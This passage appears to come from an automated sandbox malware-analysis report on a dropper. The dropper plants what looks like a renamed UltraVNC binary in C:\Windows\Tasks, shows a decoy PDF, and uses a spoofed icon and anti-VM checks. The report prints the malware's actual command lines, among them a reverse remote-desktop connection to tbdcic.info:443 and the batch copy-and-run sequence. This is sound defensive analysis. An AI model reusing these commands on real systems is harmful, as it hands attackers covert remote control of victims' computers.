rintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivat27_2_00007FF6C2B8E1D0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B881AD GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetLastError,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStrin27_2_00007FF6C2B881AD
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2BD9A40 GetPrivateProfileIntA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetPrivateProfileIntA,27_2_00007FF6C2BD9A40
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2BD77F0 GetPrivateProfileIntA,RegQueryValueExA,GetPrivateProfileIntA,27_2_00007FF6C2BD77F0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2BD7750 GetPrivateProfileIntA,RegCloseKey,RegCloseKey,RegCloseKey,27_2_00007FF6C2BD7750
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2BD7F50 GetPrivateProfileIntA,27_2_00007FF6C2BD7F50
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2BD78E0 GetPrivateProfileIntA,RegQueryValueExA,RegQueryValueExA,GetPrivateProfileStringA,27_2_00007FF6C2BD78E0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2BD7E10 GetPrivateProfileIntA,27_2_00007FF6C2BD7E10
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2BD7D50 GetPrivateProfileIntA,27_2_00007FF6C2BD7D50
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2BD7EB0 GetPrivateProfileIntA,27_2_00007FF6C2BD7EB0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2BD7650 GetPrivateProfileIntA,RegCreateKeyExA,RegCreateKeyExA,27_2_00007FF6C2BD7650
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\3889122.Khe9oLYJump to behavior

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Icon mismatch, binary includes an icon from a different legit application in order to fool users
                            Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (98).png
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BB48B0 IsIconic,IsWindowVisible,GetWindowRect,SHAppBarMessage,23_2_00007FF6C2BB48B0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2BB48B0 IsIconic,IsWindowVisible,GetWindowRect,SHAppBarMessage,27_2_00007FF6C2BB48B0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B85A60 LoadLibraryA,GetModuleFileNameA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,DeleteFileA,23_2_00007FF6C2B85A60
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Tasks\browser_sn.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Tasks\browser_sn.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Tasks\browser_sn.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Tasks\browser_sn.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BE9BC0 LoadLibraryA,GetProcAddress,GetProcAddress,GetSystemMetrics,GetCurrentProcessId,ProcessIdToSessionId,CreateToolhelp32Snapshot,Process32First,CloseHandle,FreeLibrary,ProcessIdToSessionId,ProcessIdToSessionId,CloseHandle,FreeLibrary,Process32Next,23_2_00007FF6C2BE9BC0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: OpenSCManagerA,EnumServicesStatusA,GetLastError,EnumServicesStatusA,OpenServiceA,QueryServiceConfigA,GetLastError,QueryServiceConfigA,CloseServiceHandle,CloseServiceHandle,23_2_00007FF6C2B89D00
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: OpenSCManagerA,EnumServicesStatusA,GetLastError,EnumServicesStatusA,OpenServiceA,QueryServiceConfigA,GetLastError,QueryServiceConfigA,CloseServiceHandle,CloseServiceHandle,27_2_00007FF6C2B89D00
                            Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 445Jump to behavior
                            Source: C:\Windows\Tasks\browser_sn.exeWindow / User API: threadDelayed 1212
                            Source: C:\Windows\SysWOW64\timeout.exeWindow / User API: threadDelayed 1266
                            Source: C:\Windows\Tasks\browser_sn.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_23-22366
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\uqVb3.kkb9hJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Windows\Tasks\uqVb3.kkb9hJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Windows\Tasks\conhost.exeJump to dropped file
                            Source: C:\Windows\Tasks\browser_sn.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_23-22851
                            Source: C:\Windows\Tasks\browser_sn.exeAPI coverage: 3.5 %
                            Source: C:\Windows\Tasks\browser_sn.exeAPI coverage: 1.2 %
                            Source: C:\Windows\SysWOW64\timeout.exe TID: 6708Thread sleep count: 59 > 30
                            Source: C:\Windows\SysWOW64\timeout.exe TID: 6556Thread sleep count: 35 > 30
                            Source: C:\Windows\Tasks\browser_sn.exe TID: 6324Thread sleep time: -121200s >= -30000s
                            Source: C:\Windows\SysWOW64\timeout.exe TID: 4628Thread sleep count: 69 > 30
                            Source: C:\Windows\SysWOW64\timeout.exe TID: 6808Thread sleep count: 1266 > 30
                            Source: C:\Windows\SysWOW64\timeout.exe TID: 6808Thread sleep time: -126600s >= -30000s
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\Tasks\browser_sn.exeLast function: Thread delayed
                            Source: C:\Windows\Tasks\browser_sn.exeLast function: Thread delayed
                            Source: C:\Windows\SysWOW64\timeout.exeLast function: Thread delayed
                            Source: C:\Windows\SysWOW64\timeout.exeLast function: Thread delayed
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeCode function: 0_2_00403387 GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,0_2_00403387
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeCode function: 0_2_00402EE6 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00402EE6
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BAC210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,23_2_00007FF6C2BAC210
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2C3A228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,23_2_00007FF6C2C3A228
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B85910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose,23_2_00007FF6C2B85910
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BA6DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,23_2_00007FF6C2BA6DD1
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2BAC210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,27_2_00007FF6C2BAC210
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2C3A228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,27_2_00007FF6C2C3A228
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B85910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose,27_2_00007FF6C2B85910
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2BA6DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,27_2_00007FF6C2BA6DD1
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BA6DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,23_2_00007FF6C2BA6DD1
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B99260 GetVersionExA,GetVersionExA,GetModuleHandleA,GetProcAddress,GetSystemInfo,23_2_00007FF6C2B99260
                            Source: browser_sn.exe, 0000001B.00000002.1609179550.00000000029F5000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000024.00000002.1778271780.0000000002D45000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
                            Source: browser_sn.exe, 0000001B.00000002.1609179550.00000000029F5000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000024.00000002.1778271780.0000000002D45000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
                            Source: browser_sn.exe, 00000024.00000002.1778177852.00000000011DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW:
                            Source: browser_sn.exe, 00000024.00000002.1778271780.0000000002D45000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicshutdown
                            Source: browser_sn.exe, 0000001B.00000002.1609179550.00000000029F5000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000024.00000002.1778271780.0000000002D45000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
                            Source: browser_sn.exe, 0000001B.00000002.1609179550.00000000029F5000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000024.00000002.1778271780.0000000002D45000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
                            Source: browser_sn.exe, 0000001B.00000002.1609179550.00000000029F5000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000024.00000002.1778271780.0000000002D45000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
                            Source: browser_sn.exe, 00000024.00000002.1778271780.0000000002D45000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicvss
                            Source: browser_sn.exe, 0000001B.00000002.1608916736.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000024.00000002.1778177852.00000000011DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
                            Source: browser_sn.exe, 0000001B.00000002.1609179550.00000000029F5000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000024.00000002.1778271780.0000000002D45000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
                            Source: browser_sn.exe, 0000001B.00000002.1609179550.00000000029F5000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000024.00000002.1778271780.0000000002D45000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
                            Source: browser_sn.exe, 0000001B.00000002.1609179550.00000000029F5000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000024.00000002.1778271780.0000000002D45000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
                            Source: browser_sn.exe, 00000017.00000002.1678342590.000000000123E000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000022.00000002.3280182289.0000000000FFB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: browser_sn.exe, 00000024.00000002.1778271780.0000000002D45000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
                            Source: C:\Windows\Tasks\browser_sn.exeAPI call chain: ExitProcess graph end nodegraph_23-22108
                            Source: C:\Windows\Tasks\browser_sn.exeAPI call chain: ExitProcess graph end node
                            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2C37220 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_00007FF6C2C37220
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B926B0 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,WTSGetActiveConsoleSessionId,Sleep,GetLastError,sprintf,OutputDebugStringA,Sleep,FreeLibrary,FreeLibrary,23_2_00007FF6C2B926B0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BE9BC0 LoadLibraryA,GetProcAddress,GetProcAddress,GetSystemMetrics,GetCurrentProcessId,ProcessIdToSessionId,CreateToolhelp32Snapshot,Process32First,CloseHandle,FreeLibrary,ProcessIdToSessionId,ProcessIdToSessionId,CloseHandle,FreeLibrary,Process32Next,23_2_00007FF6C2BE9BC0
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeCode function: 0_2_0040236F LoadLibraryA,GetProcAddress,GetNativeSystemInfo,0_2_0040236F
                            Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2C37220 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_00007FF6C2C37220
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2C447E4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_00007FF6C2C447E4
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2C37220 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,27_2_00007FF6C2C37220
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2C447E4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_00007FF6C2C447E4
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: LoadLibraryA,GetProcAddress,GetProcAddress,GetSystemMetrics,GetCurrentProcessId,CreateToolhelp32Snapshot,Process32First,CloseHandle,FreeLibrary,CloseHandle,FreeLibrary,Process32Next, explorer.exe27_2_00007FF6C2BE9BC0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B89BD0 GetModuleFileNameA,GetForegroundWindow,ShellExecuteExA,23_2_00007FF6C2B89BD0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B974C0 keybd_event,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,TryEnterCriticalSection,LeaveCriticalSection,keybd_event,23_2_00007FF6C2B974C0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B84390 Sleep,CreateThread,CloseHandle,SendMessageA,FindWindowA,PostMessageA,SendMessageA,mouse_event,Sleep,mouse_event,FindWindowA,PostMessageA,23_2_00007FF6C2B84390
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\"Jump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 9655269573 9655269573.cmdJump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 3889122.Khe9oLY 3889122.cmdJump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 9655269573.cmdJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im browser_sn.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\browser_sn.exe C:\Windows\Tasks\browser_sn.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 8Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\browser_sn.exe C:\Windows\Tasks\browser_sn.exe -autoreconnect -id:user-PC_Jd0Qd -connect tbdcic.info:443Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 4Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Windows\Tasks\3889122.cmd"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 600Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im browser_sn.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\browser_sn.exe C:\Windows\Tasks\browser_sn.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 8
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\browser_sn.exe C:\Windows\Tasks\browser_sn.exe -autoreconnect -id:user-PC_Jd0Qd -connect tbdcic.info:443
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 4
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im browser_sn.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im browser_sn.exe
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B97B90 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,ConvertStringSecurityDescriptorToSecurityDescriptorA,GetLastError,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,CreateFileMappingA,MapViewOfFile,CreateEventA,CreateEventA,CreateFileMappingA,MapViewOfFile,CreateEventA,CreateEventA,23_2_00007FF6C2B97B90
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeCode function: 0_2_0040244E AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0040244E
                            Source: Xv6Ya.d8LhT.0.drBinary or memory string: Program ManagerProgmanSHELLDLL_DefViewFolderViewSysListView32BlockInputtimerscreenupdatemouseupdateuser1user2quitrestartvncdesktop.cpp : ~vncDesktop
                            Source: T8xrZb7nBL.exe, 00000000.00000003.1422930123.0000000002758000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000017.00000000.1523572446.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: vncmenu.cpp : ########### Shell_TrayWnd found %i
                            Source: T8xrZb7nBL.exe, 00000000.00000003.1422930123.0000000002758000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000017.00000000.1523572446.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: Location: // basicwinhttp.dllWinHttpGetIEProxyConfigForCurrentUser;http=https==UltraVNC.ini -settingshelperWinsta0\DefaultShell_TrayWndpasswdUltraVNCpasswd2isWritablePermissions{34F673E0-878F-11D5-B98A-57B0D07B8C7C}{34F673E0-878F-11D5-B98A-00B0D07B8C7C}0~
                            Source: browser_sn.exe, browser_sn.exe, 0000001B.00000000.1606099085.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001B.00000002.1609390889.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000022.00000000.1696648797.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: Program Manager
